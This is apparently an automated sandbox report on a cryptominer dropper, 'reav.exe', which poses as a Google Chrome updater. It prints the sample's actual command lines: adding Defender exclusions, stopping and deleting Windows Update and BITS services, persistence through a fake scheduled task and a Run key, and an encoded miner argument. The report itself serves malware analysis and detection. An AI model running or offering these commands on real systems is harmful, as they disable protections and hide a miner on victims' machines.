Analysis
- max time kernel: 300s
- max time network: 297s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-09-2022 06:18

Behavioral task: behavioral1
- Sample: reav.exe
- Resource: win7-20220812-en

General
- Target: reav.exe
- Size: 7.0MB
- MD5: 4c7bc4f742346f6f5506660175637a70
- SHA1: b1c87e4395474abb15a1c6bf785bee77adfaefa5
- SHA256: 0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d
- SHA512: fdb83490b218672b0ebf32d2e9168d89865efe0373468974d05ed3fe1ac1a22c986f0e75a746da4002db280d03376179805e92b2c2a8700a90c85238231a6b29
- SSDEEP: 196608:SIcrtGJOI5qLOKdTn8a9tcpAbe+wOlWd1wUgETPCO67:SIchGlepn8+Ag6wUhPx67
Malware Config
Signatures

Modifies security service (2 TTPs, 5 IoCs)
Processes:
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | reav.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
XMRig Miner payload (2 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmp | xmrig
  behavioral2/memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmp | xmrig
Drops file in Drivers directory (2 IoCs)
Processes:
  description | ioc | process
  File created | C:\Windows\system32\drivers\etc\hosts | updater.exe
  File created | C:\Windows\system32\drivers\etc\hosts | reav.exe
Executes dropped EXE (1 IoC)
Processes:
  pid | process
  3760 | updater.exe
Stops running service(s) (3 TTPs)

Processes:
  resource | yara_rule
  behavioral2/memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmp | upx
  behavioral2/memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmp | upx
Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | reav.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | reav.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
Processes:
  resource | yara_rule
  behavioral2/memory/4024-133-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-134-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-136-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-137-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-138-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-139-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-140-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  behavioral2/memory/4024-167-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp | themida
  C:\Program Files\Google\Chrome\updater.exe | themida
  behavioral2/memory/3760-173-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-175-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-177-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-178-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-179-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-180-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  behavioral2/memory/3760-181-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
  C:\Program Files\Google\Chrome\updater.exe | themida
  behavioral2/memory/3760-227-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp | themida
Checks whether UAC is enabled
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reav.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
Drops file in System32 directory (3 IoCs)
Processes:
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
  pid | process
  4024 | reav.exe
  3760 | updater.exe
Suspicious use of SetThreadContext (2 IoCs)
Processes:
  description | pid | process | target process
  PID 3760 set thread context of 4592 | 3760 | updater.exe | conhost.exe
  PID 3760 set thread context of 4596 | 3760 | updater.exe | conhost.exe
Drops file in Program Files directory (4 IoCs)
Processes:
  description | ioc | process
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Chrome\updater.exe | reav.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
Launches sc.exe (10 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  4200 | sc.exe
  2552 | sc.exe
  4876 | sc.exe
  4656 | sc.exe
  536 | sc.exe
  2676 | sc.exe
  4652 | sc.exe
  5076 | sc.exe
  2520 | sc.exe
  4084 | sc.exe
Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: LoadsDriver (1 IoC)
Processes:
  pid | process
  656 | -
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Process tree (the number in brackets is the depth of the process in the tree; matched signatures are listed under each process):

[1] C:\Users\Admin\AppData\Local\Temp\reav.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\reav.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#mlvtn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\schtasks.exe
        Command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
[1] C:\Program Files\Google\Chrome\updater.exe
    Command line: "C:\Program Files\Google\Chrome\updater.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Windows\system32\cmd.exe
      Command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    [3] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  [2] C:\Windows\system32\cmd.exe
      Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-ac 0

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-dc 0

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-ac 0

    [3] C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-dc 0

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Windows\system32\conhost.exe
      Command line: C:\Windows\system32\conhost.exe hcrjlvsp

    [3] C:\Windows\system32\cmd.exe
        Command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        - Drops file in Program Files directory

  [2] C:\Windows\system32\cmd.exe
      Command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory

    [3] C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic PATH Win32_VideoController GET Name, VideoProcessor

  [2] C:\Windows\system32\conhost.exe
      Command line: C:\Windows\system32\conhost.exe dmxihflldgatbxwx GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gdioqe8NBSKYuPqRQikB1LSNDCZ707F9ASg+mgAaJFy
      - Suspicious behavior: EnumeratesProcesses
Downloads
- C:\Program Files\Google\Chrome\updater.exe
  Filesize: 7.0MB
  MD5: 8ae770bdb0a2d1babcc9642c82fd92a3
  SHA1: 2032658e2249a90f703dedffad238e9cb61c1278
  SHA256: 1626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
  SHA512: 26317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
- C:\Program Files\Google\Libs\g.log
  Filesize: 226B
  MD5: fdba80d4081c28c65e32fff246dc46cb
  SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
  SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
  SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 0d28e0c9fe4439db985e3a7e3c6055d7
SHA1 484c5ab56151138115cb5cedc1f2a7e4543ecf30
SHA256 c80a22a06ec7f853a86f59eed3626b842465e153ec80c893e3414a4aed26c3a4
SHA512 5b4576a36aad30c0311d270f102ff91ac9253d042e96a81d19128bdea249f68fb571492bcd9323f072d193625a9b95824204d9e7342690f47f718aea14e8f562
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 4KB
MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hosts
Filesize 2KB
MD5 378c0e9791f7cd9fc31f4aafe0cbba64
SHA1 12d145ab7a76ca1c1eb6a997dcc90616fdb56708
SHA256 6c90aa0a25ceee18fad16805237847f1d9c5d4f4e7e4d86c03461d3c0037764b
SHA512 a6ace91e18ea9bc3141b35e173118b2560844bb57799f9ee4cffef2b493d384e8030e94162fe67e3ba4940150e15c95d710bc22ceacc2bc4adf71389e2818a58
-
- memory/380-222-0x0000000000000000-mapping.dmp
- memory/448-161-0x0000000000000000-mapping.dmp
- memory/508-210-0x0000000000000000-mapping.dmp
- memory/536-205-0x0000000000000000-mapping.dmp
- memory/816-159-0x0000000000000000-mapping.dmp
- memory/920-156-0x0000000000000000-mapping.dmp
- memory/1172-165-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmp  Filesize 10.8MB
- memory/1172-160-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmp  Filesize 10.8MB
- memory/1172-147-0x0000000000000000-mapping.dmp
- memory/1332-166-0x0000000000000000-mapping.dmp
- memory/1332-170-0x00007FFC2CF30000-0x00007FFC2D9F1000-memory.dmp  Filesize 10.8MB
- memory/1332-174-0x00007FFC2CF30000-0x00007FFC2D9F1000-memory.dmp  Filesize 10.8MB
- memory/1548-171-0x0000000000000000-mapping.dmp
- memory/2124-193-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmp  Filesize 10.8MB
- memory/2124-183-0x0000000000000000-mapping.dmp
- memory/2124-188-0x00000240B5290000-0x00000240B529A000-memory.dmp  Filesize 40KB
- memory/2124-187-0x00000240B52B0000-0x00000240B52CC000-memory.dmp  Filesize 112KB
- memory/2124-189-0x00000240B52F0000-0x00000240B530A000-memory.dmp  Filesize 104KB
- memory/2124-184-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmp  Filesize 10.8MB
- memory/2124-190-0x00000240B52A0000-0x00000240B52A8000-memory.dmp  Filesize 32KB
- memory/2124-186-0x00000240B5280000-0x00000240B528A000-memory.dmp  Filesize 40KB
- memory/2124-192-0x00000240B52E0000-0x00000240B52EA000-memory.dmp  Filesize 40KB
- memory/2124-185-0x00000240B5260000-0x00000240B527C000-memory.dmp  Filesize 112KB
- memory/2124-191-0x00000240B52D0000-0x00000240B52D6000-memory.dmp  Filesize 24KB
- memory/2140-212-0x0000000000000000-mapping.dmp
- memory/2232-204-0x0000000000000000-mapping.dmp
- memory/2396-213-0x0000000000000000-mapping.dmp
- memory/2464-163-0x0000000000000000-mapping.dmp
- memory/2520-198-0x0000000000000000-mapping.dmp
- memory/2552-154-0x0000000000000000-mapping.dmp
- memory/2676-207-0x0000000000000000-mapping.dmp
- memory/2732-158-0x0000000000000000-mapping.dmp
- memory/2784-146-0x0000000000000000-mapping.dmp
- memory/2836-214-0x0000000000000000-mapping.dmp
- memory/2880-211-0x0000000000000000-mapping.dmp
- memory/3152-195-0x0000000000000000-mapping.dmp
- memory/3168-145-0x0000000000000000-mapping.dmp
- memory/3716-142-0x0000000000000000-mapping.dmp
- memory/3716-143-0x00000246F1DF0000-0x00000246F1E12000-memory.dmp  Filesize 136KB
- memory/3716-144-0x00007FFC2CE10000-0x00007FFC2D8D1000-memory.dmp  Filesize 10.8MB
- memory/3760-182-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/3760-181-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-175-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-228-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/3760-227-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-176-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/3760-177-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-178-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-179-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-180-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3760-173-0x00007FF60EBF0000-0x00007FF60F8D9000-memory.dmp  Filesize 12.9MB
- memory/3944-206-0x0000000000000000-mapping.dmp
- memory/3980-220-0x0000000000000000-mapping.dmp
- memory/4024-137-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-168-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/4024-138-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-136-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-134-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-135-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/4024-133-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-139-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-140-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-167-0x00007FF6CBFB0000-0x00007FF6CCC99000-memory.dmp  Filesize 12.9MB
- memory/4024-141-0x00007FFC4BF30000-0x00007FFC4C125000-memory.dmp  Filesize 2.0MB
- memory/4052-217-0x000002C5FC499000-0x000002C5FC49F000-memory.dmp  Filesize 24KB
- memory/4052-216-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmp  Filesize 10.8MB
- memory/4052-215-0x000002C5FC499000-0x000002C5FC49F000-memory.dmp  Filesize 24KB
- memory/4052-197-0x0000000000000000-mapping.dmp
- memory/4052-202-0x00007FFC2DD50000-0x00007FFC2E811000-memory.dmp  Filesize 10.8MB
- memory/4084-209-0x0000000000000000-mapping.dmp
- memory/4116-152-0x0000000000000000-mapping.dmp
- memory/4200-151-0x0000000000000000-mapping.dmp
- memory/4396-219-0x0000000000000000-mapping.dmp
- memory/4420-208-0x0000000000000000-mapping.dmp
- memory/4528-200-0x0000000000000000-mapping.dmp
- memory/4552-164-0x0000000000000000-mapping.dmp
- memory/4592-218-0x00007FF7518614E0-mapping.dmp
- memory/4596-225-0x000002288A6D0000-0x000002288A6F0000-memory.dmp  Filesize 128KB
- memory/4596-224-0x00007FF6874025D0-mapping.dmp
- memory/4596-226-0x00007FF686C10000-0x00007FF687404000-memory.dmp  Filesize 8.0MB
- memory/4596-229-0x00007FF686C10000-0x00007FF687404000-memory.dmp  Filesize 8.0MB
- memory/4652-149-0x0000000000000000-mapping.dmp
- memory/4656-203-0x0000000000000000-mapping.dmp
- memory/4716-162-0x0000000000000000-mapping.dmp
- memory/4876-157-0x0000000000000000-mapping.dmp
- memory/5028-150-0x0000000000000000-mapping.dmp
- memory/5040-194-0x0000000000000000-mapping.dmp
- memory/5076-155-0x0000000000000000-mapping.dmp